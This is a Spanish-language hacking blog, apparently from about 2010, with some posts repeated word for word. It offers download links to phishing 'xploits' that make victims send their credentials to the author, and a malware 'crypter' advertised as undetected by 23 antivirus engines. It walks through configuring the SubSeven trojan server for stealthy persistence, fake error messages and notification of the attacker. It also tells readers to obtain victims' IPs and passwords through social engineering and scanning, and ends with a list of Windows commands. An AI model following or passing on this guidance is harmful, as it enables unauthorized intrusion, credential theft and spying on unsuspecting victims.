bueno les dejo 2 xploits que me mande ayer
para los que no saben los xploits son lanzadores de mentiras para que entiendan
esto se usa para engañar a lusers...no me equivoque ( limited +user+ looser=luser)
->http://www.mediafire.com/?gunymmyvmdz
este es un intento de kak
lo mandas y con suerte hacen lo dictado para supuestamente kakear a un amigo, pero enrealidad se kakean ellos mismo y mandan la direccion a mi cuenta luego se las paso ;)
http://www.mediafire.com/?odgg0jtmzj3
y este ^ es casi lo mismo nada mas que se usa tambien para fake para que la victima piense que sirve para sacar virus del msn ;) leanlos y pruebenlos ;)
ola! hace bastante q no posteo es x q estuve con varios trabajitos tengo cosas nuevas
voy a ir posteando de a poco!sin alterar lammers!! ¬ ¬
1- un groso: HAXINSANITY! te admiro bro aunqe traidor xD un kaker groso like me :P
les paso el msn?????mmmm??? me lo piden
si nesesitan algun trabajito ;) o si me quieren agregar agregen aca es mi msn para kakear
thakakeritshere@hotmail.com para la personalida secreta you know ;)
voy a ir posteando de a poco!sin alterar lammers!! ¬ ¬
1- un groso: HAXINSANITY! te admiro bro aunqe traidor xD un kaker groso like me :P
les paso el msn?????mmmm??? me lo piden
si nesesitan algun trabajito ;) o si me quieren agregar agregen aca es mi msn para kakear
thakakeritshere@hotmail.com para la personalida secreta you know ;)
Bueno les traigo el US_Cripter,es el cripter mas peque~o del mundo,le hice una mod y lo deje limpio aca abajo les dejo el scan
Espero su motivacion!!!Probado en XP (diganme si va en vista) algun error dejenme un comentario
q roma no se construllo en 3 dias!
SCan
Report date: 2.2.2010 at 15.47.47 (GMT 1)
File name:SpyNet v2.2.3.exe
File size: 199245 bytes
MD5 Hash: 9a10c643b8467ba0ed6a307ba68fb8ed
SHA1 Hash: 29254F3DD31A1D4200D418AF32931C3E58AE7324
SFX Archive: -
File inspector: -
Detection rate: 0 on 23
Status: CLEAN
Detections
a-squared - -Nothing Found!
Avira AntiVir - -Nothing Found!
Avast - -Nothing Found!
AVG - -Nothing Found!
BitDefender - -Nothing Found!
ClamAV - -Nothing Found!
Comodo - -Nothing Found!
Dr.Web - -Nothing Found!
F-PROT6 - -Nothing Found!
G-Data - -Nothing Found!
Ikarus T3 - -Nothing Found!
Kaspersky - -Nothing Found!
McAfee - -Nothing Found!
NOD32 v3 - -Nothing Found!
Norman - -Nothing Found!
Panda - -Nothing Found!
QuickHeal - -Nothing Found!
Solo Antivirus - -Nothing Found!
Sophos - -Nothing Found!
TrendMicro - -Nothing Found!
VBA32 - -Nothing Found!
VirusBuster - -Nothing Found!
ZonerAntivirus - -Nothing Found!
http://img5.xooimage.com/files/4/4/7/us_cripter-1848f79.exe
Espero su motivacion!!!Probado en XP (diganme si va en vista) algun error dejenme un comentario
q roma no se construllo en 3 dias!
SCan
Report date: 2.2.2010 at 15.47.47 (GMT 1)
File name:SpyNet v2.2.3.exe
File size: 199245 bytes
MD5 Hash: 9a10c643b8467ba0ed6a307ba68fb8ed
SHA1 Hash: 29254F3DD31A1D4200D418AF32931C3E58AE7324
SFX Archive: -
File inspector: -
Detection rate: 0 on 23
Status: CLEAN
Detections
a-squared - -Nothing Found!
Avira AntiVir - -Nothing Found!
Avast - -Nothing Found!
AVG - -Nothing Found!
BitDefender - -Nothing Found!
ClamAV - -Nothing Found!
Comodo - -Nothing Found!
Dr.Web - -Nothing Found!
F-PROT6 - -Nothing Found!
G-Data - -Nothing Found!
Ikarus T3 - -Nothing Found!
Kaspersky - -Nothing Found!
McAfee - -Nothing Found!
NOD32 v3 - -Nothing Found!
Norman - -Nothing Found!
Panda - -Nothing Found!
QuickHeal - -Nothing Found!
Solo Antivirus - -Nothing Found!
Sophos - -Nothing Found!
TrendMicro - -Nothing Found!
VBA32 - -Nothing Found!
VirusBuster - -Nothing Found!
ZonerAntivirus - -Nothing Found!
http://img5.xooimage.com/files/4/4/7/us_cripter-1848f79.exe
bueno la mejor parte
TROYANOS
les voy a explicar el subseven legends
primero descargatelo de aca
http://www.hackersdelocos.com.ar/sub7legends.zip
ATENCION: NUNCA EJECUTAR EL SERVER.EXE YA QUE ESTO NO HARÁ DÉBIL A EL ATAQUE, NOS PODRÁN HACKEAR LA MAQUINA ESTA CLARO NO???acordate antes de leer esto tenes que haber leido la parte DOS y IP
Pero para que sirven estos archivos ?
Aca vamos: El editserver (editserver.exe) sirve para editar el cliente del troyano (SubSeven.exe) este sera nuestro primer paso. Luego esta el server.exe (troyano) que no debemos ejecutar. Y por ultimo el SubSeven.exe (cliente) este es el que vamos a usar para hackiar una maquina.
Editar el server.exe (troyano) a nuestro gusto.
A TRABAJAR
Para editar el Server ejecutamos el editserver.exe, Bueno a partir de acá te voy a traducir paso por paso para que entiendas esta parte que esta muy buena. Son 10 pasos de los cuales están todos en ingles, pero gracias a mi vas a poder pasarlos sin ninguna dificultad. Copado no?
En el paso numero 1 nos da una bienvenida y el autor nos cuenta un par de chamullos a los que no da para ponerlos acá. Ponemos siguiente y listo.
Bueno, en primer lugar, debemos asignar el lugar donde se encuentra el server.exe, clickiar el botón "Browse" y buscar el archivo.
OK, ahora debemos, si queremos, tildar las tres casillas y en la primera asignarle un puerto, el que quieren que el Server abra, si no la tildan, quedara el 1243 que es el que usa sub seven por defecto. Luego debemos asignarle un password, así el único que podrá hackear seremos nosotros debido a que si otro intenta hackiar, tendra que introducir el password que pusimos. Al menos que sepa el password, esto cambiaria todo. la tercer casilla
activémosla si queremos aunque si no la activamos lo de el password no tendrá ningun efecto al activarla este protejera el puerto mediante el password que pusimos al hackiar nos pedira el password.
Especifica el nombre del archivo del servidor, despues de la instalacion incluyendo la extension. Ya que el sub7 nos permite darle un nombre y otra extencion que no sea ejecutable. (specify filename). Aunque si no tenes ninguna idea lo que es esto, solo usa lo que viene por defecto: (use default name). Al activar la ultima casilla lo que hara sera que el servidor, despues de la instalacion o sea cuando la victima ejecute el servidor, este servidor se instalara y borrara el archivo ejecutado. Siguiente y listo ese paso.
Otras de las maravillosas cosas que se pueden hacer con el sub7 es configurar el servidor para mostrar un mensaje del error falso cuando la victima lo ejecuta (el server) por primera vez. El mensaje de las imitaciones silo se mostrara una vez, o cada vez la victima ejecuta el archivo del server. Para hacer esto debemos clickiar la casilla y luego clickiar donde dice "configure" asi podemos configurar el mensaje, icono, opciones, etc.
Esta parte esta genial. Podemos configurarlo para que no avise cuando el usuario esta conectado, no puede avisar a nuestro icq, nuestro canal en el irc, o a nuestro e-mail. Para hacerlo debemos tildar lo que nos interese si tenemos icq, icq. Si este se encuentra en el mismo irc que nosotros podemos asignarle que no avise poniendo el irc, puerto y que canal queres que te avise, o sino a el mail pero a el mail es un quilombo por que es solo si tenes el e-mail en alguno de los servidores de la lista.
Obvio que cada Server puede ser editado diferente por ejemplo debemos tener un Server para cada victima me explico? bueno. Copiando y pegando se pueden crear muchísimos Server y cada uno editarlo de distintas maneras. En esta parte debemos poner el nombre de la victima, con esto podremos identificarla.
Para que no se de cuenta de la presencia del troyanos, hay métodos. El método carga de la computadora. Si la victima es un usuario de las experimentado en Windows entonces tilda (less known method) o (_not_known method). Si la victima no tiene experiencia usa cualquiera de los otros métodos.
Bueno, son las dos ultimas opciones: El archivo exe, para usarlo con el cliente Y la segunda casilla es para que el server que editamos no pueda ser modificado. Nos pide un password y la proxima ves que queramos editarlo, bueno no va a pedir el password que pusimos. No te lo olvides!.
me imagino que te diste cuenta que en el ip va el ip que lograste sacar mediante la seccion ip? no?
despues todo es facil ya
ok listo pudiste te diste cuenta entonces LLegaste papa! Solo resta salvar todo y hackiar! Bueno seguro que no entendes que corno dice ahi pero bue! yo te explico. El primer icono salva todo con los nuevos cambios. El segundo lo que hace es guardar los cambios pero en otro server o sea copia otro server y guarda los cambios dejando un server limpito como viene de fabrica! Ja!. Y bue llegamos a la ultima opción que es la de salvar todo así como esta y salir rápidamente. Copado no?
TROYANOS
les voy a explicar el subseven legends
primero descargatelo de aca
http://www.hackersdelocos.com.ar/sub7legends.zip
ATENCION: NUNCA EJECUTAR EL SERVER.EXE YA QUE ESTO NO HARÁ DÉBIL A EL ATAQUE, NOS PODRÁN HACKEAR LA MAQUINA ESTA CLARO NO???acordate antes de leer esto tenes que haber leido la parte DOS y IP
Pero para que sirven estos archivos ?
Aca vamos: El editserver (editserver.exe) sirve para editar el cliente del troyano (SubSeven.exe) este sera nuestro primer paso. Luego esta el server.exe (troyano) que no debemos ejecutar. Y por ultimo el SubSeven.exe (cliente) este es el que vamos a usar para hackiar una maquina.
Editar el server.exe (troyano) a nuestro gusto.
A TRABAJAR
Para editar el Server ejecutamos el editserver.exe, Bueno a partir de acá te voy a traducir paso por paso para que entiendas esta parte que esta muy buena. Son 10 pasos de los cuales están todos en ingles, pero gracias a mi vas a poder pasarlos sin ninguna dificultad. Copado no?
En el paso numero 1 nos da una bienvenida y el autor nos cuenta un par de chamullos a los que no da para ponerlos acá. Ponemos siguiente y listo.
Bueno, en primer lugar, debemos asignar el lugar donde se encuentra el server.exe, clickiar el botón "Browse" y buscar el archivo.
OK, ahora debemos, si queremos, tildar las tres casillas y en la primera asignarle un puerto, el que quieren que el Server abra, si no la tildan, quedara el 1243 que es el que usa sub seven por defecto. Luego debemos asignarle un password, así el único que podrá hackear seremos nosotros debido a que si otro intenta hackiar, tendra que introducir el password que pusimos. Al menos que sepa el password, esto cambiaria todo. la tercer casilla
activémosla si queremos aunque si no la activamos lo de el password no tendrá ningun efecto al activarla este protejera el puerto mediante el password que pusimos al hackiar nos pedira el password.
Especifica el nombre del archivo del servidor, despues de la instalacion incluyendo la extension. Ya que el sub7 nos permite darle un nombre y otra extencion que no sea ejecutable. (specify filename). Aunque si no tenes ninguna idea lo que es esto, solo usa lo que viene por defecto: (use default name). Al activar la ultima casilla lo que hara sera que el servidor, despues de la instalacion o sea cuando la victima ejecute el servidor, este servidor se instalara y borrara el archivo ejecutado. Siguiente y listo ese paso.
Otras de las maravillosas cosas que se pueden hacer con el sub7 es configurar el servidor para mostrar un mensaje del error falso cuando la victima lo ejecuta (el server) por primera vez. El mensaje de las imitaciones silo se mostrara una vez, o cada vez la victima ejecuta el archivo del server. Para hacer esto debemos clickiar la casilla y luego clickiar donde dice "configure" asi podemos configurar el mensaje, icono, opciones, etc.
Esta parte esta genial. Podemos configurarlo para que no avise cuando el usuario esta conectado, no puede avisar a nuestro icq, nuestro canal en el irc, o a nuestro e-mail. Para hacerlo debemos tildar lo que nos interese si tenemos icq, icq. Si este se encuentra en el mismo irc que nosotros podemos asignarle que no avise poniendo el irc, puerto y que canal queres que te avise, o sino a el mail pero a el mail es un quilombo por que es solo si tenes el e-mail en alguno de los servidores de la lista.
Obvio que cada Server puede ser editado diferente por ejemplo debemos tener un Server para cada victima me explico? bueno. Copiando y pegando se pueden crear muchísimos Server y cada uno editarlo de distintas maneras. En esta parte debemos poner el nombre de la victima, con esto podremos identificarla.
Para que no se de cuenta de la presencia del troyanos, hay métodos. El método carga de la computadora. Si la victima es un usuario de las experimentado en Windows entonces tilda (less known method) o (_not_known method). Si la victima no tiene experiencia usa cualquiera de los otros métodos.
Bueno, son las dos ultimas opciones: El archivo exe, para usarlo con el cliente Y la segunda casilla es para que el server que editamos no pueda ser modificado. Nos pide un password y la proxima ves que queramos editarlo, bueno no va a pedir el password que pusimos. No te lo olvides!.
me imagino que te diste cuenta que en el ip va el ip que lograste sacar mediante la seccion ip? no?
despues todo es facil ya
ok listo pudiste te diste cuenta entonces LLegaste papa! Solo resta salvar todo y hackiar! Bueno seguro que no entendes que corno dice ahi pero bue! yo te explico. El primer icono salva todo con los nuevos cambios. El segundo lo que hace es guardar los cambios pero en otro server o sea copia otro server y guarda los cambios dejando un server limpito como viene de fabrica! Ja!. Y bue llegamos a la ultima opción que es la de salvar todo así como esta y salir rápidamente. Copado no?
ante todo bajarse el netscan:
Herramienta para explorar la red privada o pública entera. Recupere el estado de la conexión y opinión todo el puerto abierto en la máquina remota. Haga la ventana simplemente de uso fácil del zócalo del trought de la conexión y del comunicate.
http://www.fileheaven.com/bajar/net-scan/64401.htm
si podes pasate entes por la seccion DOS para poder usar el ip
si no sabes tu ip : www.cualesmiip.com
podes usar ingenieria social para poder hacer que te digan su ip , es mas facil por ahora para ustedes,
una vez que te digan el numero grande que ven en la pagina
mediante los pasos de DOS o netscan (arriba) sabes si esta conectado, obvio ya que te lo paso,
despues en la seccion de programas http://soihackereh.blogspot.com/2010/01/unos-cuantos-programitas.html
bajas un portscanner sirve para escanear algun puerto abierto en la pc de la "victima por ejemplo 30 es el mas utilizado, luego mediante leer o msnjearme la seccion DOS intentas entrar tambien te recomiendo bajarte un sacapass para la contraseña de la pc alternativa
lo proximo que tenes que saber es el usuario que tiene la pc en eso podes explayarte con ingenieria social o si es o era tu amigo una vez que vayas a la casa te fijas es solo mirar lo proximo es cuando tengas todo
osea ip, puerto y usuario con contraseña
bajarte un troyano, ya empezas a ser mas grande te gusto no?:P
en mi blog ahi muchos troyanos asique fijate te recomiendo el turkojam o el subseven los que yo uso, y bueno despues hablamos en la parte troyanos ; looki
Herramienta para explorar la red privada o pública entera. Recupere el estado de la conexión y opinión todo el puerto abierto en la máquina remota. Haga la ventana simplemente de uso fácil del zócalo del trought de la conexión y del comunicate.
http://www.fileheaven.com/bajar/net-scan/64401.htm
si podes pasate entes por la seccion DOS para poder usar el ip
si no sabes tu ip : www.cualesmiip.com
podes usar ingenieria social para poder hacer que te digan su ip , es mas facil por ahora para ustedes,
una vez que te digan el numero grande que ven en la pagina
mediante los pasos de DOS o netscan (arriba) sabes si esta conectado, obvio ya que te lo paso,
despues en la seccion de programas http://soihackereh.blogspot.com/2010/01/unos-cuantos-programitas.html
bajas un portscanner sirve para escanear algun puerto abierto en la pc de la "victima por ejemplo 30 es el mas utilizado, luego mediante leer o msnjearme la seccion DOS intentas entrar tambien te recomiendo bajarte un sacapass para la contraseña de la pc alternativa
lo proximo que tenes que saber es el usuario que tiene la pc en eso podes explayarte con ingenieria social o si es o era tu amigo una vez que vayas a la casa te fijas es solo mirar lo proximo es cuando tengas todo
osea ip, puerto y usuario con contraseña
bajarte un troyano, ya empezas a ser mas grande te gusto no?:P
en mi blog ahi muchos troyanos asique fijate te recomiendo el turkojam o el subseven los que yo uso, y bueno despues hablamos en la parte troyanos ; looki
COMANDOS DOS
netstat: para comprobar el estado de la red
Comando para comprobar el estado actual de la red
netstat -a Mostrar todos los puetos y conexiones
netstat -n Mostrar número de puerto y direcciones
netstat -r Mostrar la tabla de rutas
netstat -s Mostar estadísticas por protocolo
netstat -p tcp/udp Mostrar las conexiones activas TCP o UDP
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders
Suscribirse a:
Entradas (Atom)
